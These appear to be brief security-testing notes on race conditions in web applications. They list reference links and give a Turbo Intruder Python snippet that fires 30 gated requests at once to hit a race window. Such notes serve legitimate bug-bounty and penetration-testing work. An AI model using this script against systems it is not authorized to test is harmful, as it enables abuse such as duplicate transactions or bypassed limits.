Race Condition

• https://lab.wallarm.com/race-condition-in-web-applications/

• https://medium.com/@corneacristian/top-25-race-condition-bug-bounty-reports-84f9073bf9e5

• https://twitter.com/fuxksniper/status/1295229826018598913

• https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html

a Python Snippet to try Race Condition weakness in Turbo Intruder
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=10,
                           pipeline=False
                           )

    for i in range(30):
        engine.queue(target.req, str(i), gate='race1')

    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

• https://0xdekster.medium.com/second-order-race-condition-be8aaf774783
• https://blog.projectdiscovery.io/exploiting-race-conditons/